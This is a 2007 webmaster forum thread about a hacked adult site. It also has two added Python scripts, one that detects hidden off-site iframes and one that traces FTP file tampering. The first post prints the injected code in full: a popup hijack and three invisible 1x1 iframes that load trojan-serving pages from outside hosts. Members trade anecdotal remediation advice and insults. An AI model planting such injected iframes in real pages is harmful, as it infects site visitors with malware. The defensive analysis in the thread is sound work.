Greenguy's Board


Old 2007-02-25, 08:50 AM   #1
SaucyPanties
Hackers?

One of our sites www.sexliveporn.com has some code which is trying to load. I have reported it to the host but has anyone else had any experience of this? The following code is not ours... Edit: removed some quote marks in case I cause a problem here...

script language="JavaScript"
<!--

function SymError()
{
return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
return (new Object());
}

window.open = SymWinOpen;

//-->
/script

script language="JavaScript"> OW=window.open("http://abdkmfgij.wheezeruffled.com/e/?cehlfgijxoooqyabdkmzcv","OWP", "toolbar=1,location=1,status=1,menubar=1,scrollbars=2,resizable=1")</script>
<iframe src='http://prevedtraf.biz/adv/167/new.php' width=1 height=1></iframe>
<iframe src='http://prevedtraf.biz/adv/new.php?adv=167' width=1 height=1></iframe>
<iframe src="http://yaxmtxhfen.biz/dl/adv407.php" width=1 height=1></iframe
</body>

</html>


<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
window.open = SymWinOpen;
if(SymRealOnUnload != null)
SymRealOnUnload();
}

function SymOnLoad()
{
if(SymRealOnLoad != null)
SymRealOnLoad();
window.open = SymRealWinOpen;
SymRealOnUnload = window.onunload;
window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
/script

Mod edit, unlinked URL in this post
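A defensive check for the pattern in the post above, added here and not part of the original thread: it lists iframes that load from another host and are sized or styled to be invisible, as the 1x1 frames in the injected block are. The hosts in the sample page and the `own_hosts` allow-list are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_PX = 2  # frames this small in either dimension are treated as invisible


def pixels(value):
    """'1' or '1px' -> 1; percentages, junk or a missing attribute -> None."""
    value = (value or "").strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdecimal() else None


class HiddenIframeFinder(HTMLParser):
    """Collects (line, host, src) for off-site iframes a visitor cannot see."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        try:
            host = (urlparse(src).hostname or "").lower()
        except ValueError:          # malformed URL: report it rather than skip it
            host = "(unparseable)"
        style = (a.get("style") or "").replace(" ", "").lower()
        sizes = [pixels(a.get("width")), pixels(a.get("height"))]
        tiny = any(s is not None and s <= MAX_PX for s in sizes)
        hidden = "display:none" in style or "visibility:hidden" in style
        # Relative or same-site frames are skipped; only off-site ones count.
        if host and host not in self.own_hosts and (tiny or hidden):
            self.findings.append((self.getpos()[0], host, src))


def scan_html(text, own_hosts=()):
    """Return [(line, host, src), ...] for hidden off-site iframes in text."""
    finder = HiddenIframeFinder(own_hosts)
    finder.feed(text)
    finder.close()
    return finder.findings


# Constructed sample page: one legitimate embed and two hidden frames.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://embed.partner.example/room/1" width=600 height=400></iframe>
<iframe src='http://traffic.badhost.example/adv/new.php' width=1 height=1></iframe>
<iframe src="http://cdn.partner.example/x" style="display: none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for line, host, src in scan_html(SAMPLE, own_hosts={"embed.partner.example"}):
        print(f"line {line}: hidden iframe to {host} ({src})")
```

Run it over a known-good copy of the page first so that frames you placed yourself end up in `own_hosts` before you scan the live files.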
Old 2007-02-25, 09:02 AM   #2
Useless
A site:prevedtraf.biz search in Google says it all. This site may harm your computer.

Your site has an exploit and it's definitely an issue for your host to handle. It may even be a server-wide issue.
Old 2007-02-25, 09:06 AM   #3
Chimera
Your site is currently attempting to load what my virus scanner defines as a trojan. I had to alt-F4 and do a complete scan after viewing that page.
Old 2007-02-25, 09:36 AM   #4
SaucyPanties
Okay thanks, I had already fired a message off to the host. Will wait to see what they say, I was thinking of moving this site so maybe now is a good time.
Old 2007-02-25, 09:37 AM   #5
Cleo
Just for the fuck of it I went to the page using Safari on a Mac… After my browser put up a dialog saying it didn't have the correct plugin to run the script it crashed my browser.
Old 2007-02-25, 09:40 AM   #6
MrYum
Yup, sure looks like your server has been compromised somehow

Fuckin assholes
Old 2007-02-25, 09:43 AM   #7
Cleo
all your base belong to us
Old 2007-02-25, 10:01 AM   #8
Licker4U
I had a similar problem two days ago. Somehow while working on the index page for my hub, I uploaded what my server tech called "malicious html". Norton Anti Virus never made a peep. They told me about AVG Anti Virus (free) and it found it on my computer and deleted it. It was a Trojan downloader. I deleted the index page from my server and uploaded the clean version. My password for FTP access didn't work so the host re-set it for me. You might need to delete the file in question and re-upload a "clean" file. That might be the fastest and simplest solution.
Old 2007-02-25, 10:02 AM   #9
SaucyPanties
Just read on another forum a few others having or had this problem. Now it does use cams.com iframes on an inner page, I have read before iframes cause hack problems. What do I do, wait for the host to look into it or re-upload the index?
Old 2007-02-25, 10:18 AM   #10
Useless
If the server has been exploited, you can keep uploading your pages all day long and it won't matter. That thing will creep back onto your site. The most important thing right now is for the host to figure out how they got in, seal up the hole - then repair the damage.
Old 2007-02-25, 10:33 AM   #11
cd34
That exploit is typically installed through FTP rather than a server exploit. I would change your password, have your host find out what IP address modified the files (there will be a GET followed by a PUT), then find all of the files that the IP address modified. Typically, they will only modify domains in the root of each domain name, and usually only index.html and index.php.
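The log check cd34 describes, sketched as an added example (not code from the thread): it finds addresses that downloaded a file and then uploaded over it, and lists everything each of them uploaded. It assumes the FTP server writes the wu-ftpd/ProFTPD `xferlog` format, which the thread does not specify, and that the log is in time order; the sample records, IP addresses and the `siteowner` account are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed gap allowed between fetch and overwrite


def parse_xferlog(line):
    """Parse one xferlog record; returns None for lines that do not fit."""
    tok = line.split()
    if len(tok) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(tok[:5]), "%a %b %d %H:%M:%S %Y")
    except ValueError:
        return None
    # The nine trailing fields are fixed, so a path containing spaces survives.
    return {"when": when, "ip": tok[6], "path": " ".join(tok[8:-9]),
            "direction": tok[-7], "user": tok[-5], "complete": tok[-1] == "c"}


def find_tamperers(lines, known_ips=()):
    """Map each unknown IP that fetched a file and then overwrote it
    to every file that IP uploaded."""
    fetched = {}                  # (ip, path) -> time of the last download
    uploads = defaultdict(set)    # ip -> every path it uploaded
    suspects = set()
    for rec in filter(None, map(parse_xferlog, lines)):
        if not rec["complete"] or rec["ip"] in known_ips:
            continue
        key = (rec["ip"], rec["path"])
        if rec["direction"] == "o":        # outgoing: the client did a GET
            fetched[key] = rec["when"]
        elif rec["direction"] == "i":      # incoming: the client did a PUT
            uploads[rec["ip"]].add(rec["path"])
            got = fetched.get(key)
            if got is not None and timedelta(0) <= rec["when"] - got <= WINDOW:
                suspects.add(rec["ip"])
    return {ip: sorted(uploads[ip]) for ip in sorted(suspects)}


# Constructed sample log: the owner's upload, an automated GET/PUT pair on
# two index files from another address, and an unrelated download.
SAMPLE_LOG = """\
Mon Feb  5 14:02:11 2007 2 198.51.100.20 8412 /home/siteowner/public_html/index.html a _ i r siteowner ftp 0 * c
Fri Feb 23 03:41:07 2007 1 203.0.113.77 8412 /home/siteowner/public_html/index.html a _ o r siteowner ftp 0 * c
Fri Feb 23 03:41:09 2007 1 203.0.113.77 9127 /home/siteowner/public_html/index.html a _ i r siteowner ftp 0 * c
Fri Feb 23 03:41:12 2007 1 203.0.113.77 3310 /home/siteowner/public_html/members/index.php a _ o r siteowner ftp 0 * c
Fri Feb 23 03:41:14 2007 1 203.0.113.77 4025 /home/siteowner/public_html/members/index.php a _ i r siteowner ftp 0 * c
Sat Feb 24 10:15:30 2007 3 192.0.2.14 120331 /home/siteowner/public_html/img/banner.jpg b _ o r siteowner ftp 0 * c
""".splitlines()

if __name__ == "__main__":
    for ip, paths in find_tamperers(SAMPLE_LOG).items():
        print(ip, "overwrote:", ", ".join(paths))
```

Pass your own addresses as `known_ips` so that a legitimate edit-and-reupload session is not reported.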
Old 2007-02-25, 10:40 AM   #12
T Pat
colo-cation.com (cd34) is why I sleep so well at night.
Old 2007-02-25, 10:59 AM   #13
Jim
Quote:
Originally Posted by T Pat View Post
colo-cation.com (cd34) is why I sleep so well at night.
Amen Pat
I have always said, when you own and host firewall.com, you are asking to be attacked. And so far as long as I have known him (1996)...nothing.
Old 2007-02-26, 02:35 AM   #14
twintone
People need to chill on immediately blaming your host. A host can not prevent someone from logging into your FTP account when they have the valid username and password! If you find this code on one of your sites, the first thing you need to do is change your password.

The problem is not with your host. Albeit possible that you have an exploit in a script, and they are dumping the code in that way. You still can't blame your host for that.

The far better chance is you have a Trojan key logger on your PC or PCs that you use to access your FTP account.

The key logger dumps your key strokes to an ICQ channel, and they have a bot that filters out the info they want. They then embed their code in your index files in an attempt to infect more people.

Why do they do this? To feed their botnet. This is just a massive botnet ring. The code that is in your html will actually infect you and surfers with 2 Trojans. One to key log all your info, and another is a backdoor to control your PC. So you too can be part of their massive botnet.

I bet you anything if you SSH into your machine, and do a last | grep [username] you will see a login from an IP that is not yours.

Download this AVS http://www.avast.com/eng/download-avast-home.html (it is free) and scan your machine in "safe mode". You will find you have a Trojan that your current AVS is not picking up.

Just on a side note. Norton AV is the biggest piece of shit on the planet, and WILL NOT find this Trojan. I would suggest getting rid of Norton immediately. It is truly garbage. http://en.wikipedia.org/wiki/Norton...irus#Criticisms

We are 100% confident from our research, and running a honeypot for a few months that Avast WILL find this Trojan. I am sure there is other AVS that will, but we know for sure Avast will, and Norton will NOT.

Good luck with it. It has been something we have seen, and have been investigating since Sep 2006.
Old 2007-02-26, 07:42 AM   #15
Useless
Quote:
Originally Posted by twintone View Post
People need to chill on immediately blaming your host.
Chill Winston!
No one is putting blame upon the host, merely stating that the host is the one who is going to typically figure the mess out. (And the one time I had that type of thing pop up on my sites, it was the virtual server I hosted on that had an Apache exploit.)

If you think we're a bunch of dummies, I'll point you toward the mainstream board I'm hanging at. GoDaddy All the Way! with that crowd.
Old 2007-02-26, 09:18 AM   #16
Wazdom
thanks twintone been looking for new anti-virus
Old 2007-02-26, 10:05 AM   #17
twintone
Quote:
Originally Posted by Useless Warrior View Post
Chill Winston!
No one is putting blame upon the host, merely stating that the host is the one who is going to typically figure the mess out. (And the one time I had that type of thing pop up on my sites, it was the virtual server I hosted on that had an Apache exploit.)

If you think we're a bunch of dummies, I'll point you toward the mainstream board I'm hanging at. GoDaddy All the Way! with that crowd.
Quote:
Originally Posted by Useless Warrior View Post
Your site has an exploit and it's definitely an issue for your host to handle. It may even be a server-wide issue.
To me, that sounds like putting the responsibility on the host.
Old 2007-02-26, 11:01 AM   #18
SaucyPanties
The host asked if I had any scripts running, I said not to my knowledge apart from natemail if you call that a script. The host asked if I had any cgi programs installed, I said no. The host said they cannot see anyone logging in over the past several days including myself and then started to ask more questions about the site, I politely invited them to visit my files and take a look around... I think it is time to change hosts... It could be me but I highly doubt it, I am a very small fish and have lots of antivirus in place. I uploaded the index page 20 days ago, it was fine 4 days ago, sometime over the last 3-4 days it got hacked. Considering my last connection to FTP was 20 days ago I have to believe it is the host... My host seems very laid back about it, considering there could be a security issue you would think they would look a little deeper.. I am signing up with Cyberwurx as they have offered to double any bandwidth...
Old 2007-02-26, 11:08 AM   #19
twintone
Quote:
Originally Posted by SaucyPanties View Post
The host asked if I had any scripts running, I said not to my knowledge apart from natemail if you call that a script. The host asked if I had any cgi programs installed, I said no. The host said they cannot see anyone logging in over the past several days including myself and then started to ask more questions about the site, I politely invited them to visit my files and take a look around... I think it is time to change hosts... It could be me but I highly doubt it, I am a very small fish and have lots of antivirus in place. I uploaded the index page 20 days ago, it was fine 4 days ago, sometime over the last 3-4 days it got hacked. Considering my last connection to FTP was 20 days ago I have to believe it is the host... My host seems very laid back about it, considering there could be a security issue you would think they would look a little deeper.. I am signing up with Cyberwurx as they have offered to double any bandwidth...
In your case it very well may be the host. I know Servage is extremely unsecure with their FTP setup. Logging into FTP you are able to go up a directory and view files of other users on that machine. I don't know if it is possible to write to files, but if for some reason you could, these guys could infect every index file on a virtual server in a hurry. Pretty scary.
Old 2007-02-26, 03:40 PM   #20
Useless
Quote:
Originally Posted by twintone View Post
To me, that sounds like putting the responsibility on the host.
I said "Your site has an exploit and it's definitely an issue for your host to handle. It may even be a server-wide issue." That statement doesn't place the blame anywhere. Expecting the assistance of one's host when dealing with an exploit shouldn't be a GREAT BIG FUCKING SHOCK!!!
Quote:
Originally Posted by twintone
In your case it very well may be the host. I know Servage is extremely unsecure with their FTP setup. Logging into FTP you are able to go up a directory and view files of other users on that machine.
That, my friend, is blaming the host.
Old 2007-02-26, 04:33 PM   #21
twintone
Right, you are making a statement like it is a FACT! "Your site has an exploit and it's definitely an issue for your host to handle." How the hell do you know it is an exploit? You are most likely leading people down the wrong path for a resolution to the problem. Again, it is possible it is an exploit in a script, but chances are about 99% it is a Trojan on their PC.

A Trojan on a PC that logs your key strokes isn't an exploit. I see people on every board freaking out on their host that they suck because their site is getting hacked. The chances of a system wide exploit that is the full responsibility of the host are close to zero.

No one is saying that a host can't get involved and help with this type of thing. My problem is with people crying that their host sucks, when in fact they have a Trojan stealing their password. I have helped at least 20 people with this issue, and every one of them has had this Trojan on their PC. Once they got rid of the Trojan, the problem stopped.

And as far as Servage goes. By having FTP setup the way they do is not secure, and yes they need to take blame for that. However, people should be protecting their PCs and not having their user / pass being keylogged in the first place. Most hosts aren't as dumb as Servage, and have their system setup that way.

I try to make a helpful post, and be somewhat to the point about it, and you turn it into a pissing match. I don't have time to waste on someone who really doesn't know what they are talking about, turn something useful into a fight.
Old 2007-02-26, 06:01 PM   #22
Wazdom
twintone I think you're right on the money, user not server

servage had my eyes like saucers when I read "WebDrive (S" that has to be like a valentine card for hackers LOL .. but this thread has nothing to do with servage, the site in question isn't hosted there .. it is, however, a valid example of weak technical management
Old 2007-02-27, 01:25 AM   #23
Useless
Quote:
Originally Posted by twintone View Post
Right, you are making a statement like it is a FACT! "Your site has an exploit and it's definitely an issue for your host to handle." How the hell do you know it is an exploit? You are most likely leading people down the wrong path for a resolution to the problem. Again, it is possible it is an exploit in a script, but chances are about 99% it is a Trojan on their PC.
You know, Chop said a lot of good things about you, but that doesn't count for shit after your performance in this thread. Fine, you as a host don't want to assist your customers with this type thing. Go ahead and tell them they're on their own. Good for you. Her site has an exploit - she doesn't know what to do. What should my advice be? "Too bad, it's your fault, you're fucked now." I guess I'm right out of my fucking mind to tell someone to speak to their host when their site has so obviously been exploited.

I'm giving advice based on my experience with a very similar matter. I had to leave a host due to a server-wide exploit creating very similar conditions. I've been there!

Never did I blame the host - or hosts in general. You can either chill out or go fuck yourself. Don't try to twist my words. You keep this shit up and it's only going to result in name-calling, you pathetic excuse for a sig whore.
Old 2007-02-27, 01:28 AM   #24
Useless
Quote:
Originally Posted by Wazdom View Post
twintone I think you're right on the money, user not server
Whether or not it's the user's fault that her site has been exploited is another matter. Who's going to advise her best on how to deal with the issue? The fucking host!
Old 2007-02-27, 01:30 AM   #25
oldbrad
saucy, i use cyberwurx and am very happy with them and their customer support.